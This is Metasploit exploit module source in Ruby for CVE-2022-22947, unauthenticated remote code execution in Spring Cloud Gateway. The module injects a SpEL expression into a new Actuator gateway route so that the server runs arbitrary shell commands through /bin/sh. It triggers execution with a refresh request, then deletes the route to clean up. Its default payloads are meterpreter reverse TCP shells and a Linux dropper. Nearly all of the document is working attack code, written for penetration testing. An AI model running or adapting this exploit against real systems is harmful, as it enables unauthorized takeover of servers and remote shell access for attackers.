metasploit-gs/modules/exploits/linux/http/spring_cloud_gateway_rce.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Spring Cloud Gateway Remote Code Execution',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution vulnerability in Spring Cloud Gateway
          versions = 3.1.0 and 3.0.0 to 3.0.6. The vulnerability can be exploited when the Gateway Actuator
          endpoint is enabled, exposed and unsecured. An unauthenticated attacker can use SpEL
          expressions to execute code and take control of the victim machine.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ayan Saha'
        ],
        'References' => [
          ['CVE', '2022-22947' ],
          ['URL', 'https://github.com/crowsec-edtech/CVE-2022-22947'],
          ['URL', 'https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/'],
          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22947'],
          ['URL', 'https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published']
        ],
        'Platform' => 'linux',
        'Arch' => [ARCH_X64, ARCH_CMD],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',
                'RPORT' => 9000
              }
            }
          ],
          [
            'Linux (Dropper)',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X64],
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
              'Type' => :linux_dropper
            }
          ],
        ],
        'DisclosureDate' => '2022-01-26',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
        }
      )
    )
  end

  def run_command(cmd)
    route_name = Rex::Text.rand_text_alpha(8).downcase
    uri = "/actuator/gateway/routes/#{route_name}"
    value = '#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/sh","-c", "' + cmd + '"}).getInputStream()))}'

    data = {
      'id' => route_name,
      'filters' => [
        {
          'name' => 'AddResponseHeader',
          'args' =>
            {
              'name' => 'Result',
              'value' => value
            }
        }
      ],
      'uri' => "http://#{Rex::Text.rand_text_alphanumeric(6..15)}.com"
    }

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri),
      'ctype' => 'application/json',
      'data' => JSON.generate(data)
    })

    if res && res.code == 201 && res.message == 'Created'
      return route_name
    else
      return nil
    end
  end

  ## Takes in the command and creates a new route with it on the server
  def execute_command(cmd, _opts = {})
    route_name = run_command(cmd)
    if route_name
      refresh
      cleanup_route(route_name)
    else
      return false
    end
    return true
  end

  ## Cleaning up the routes created
  def cleanup_route(route_name)
    uri = "/actuator/gateway/routes/#{route_name}"
    res = send_request_cgi({
      'method' => 'DELETE',
      'uri' => normalize_uri(uri)
    })

    if res && res.code == 200
      print_good('Route deleted')
      return true
    else
      print_error("Couldn't delete route. Might require manual cleanup.")
      return false
    end
  end

  def check
    print_status('Checking if server is vulnerable')
    res = execute_command('whoami')

    if res
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  ## Refresh the gateway to trigger the routes with commands created
  def refresh
    print_status('Triggering code execution using routes')
    uri = '/actuator/gateway/refresh'

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri)
    })
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

end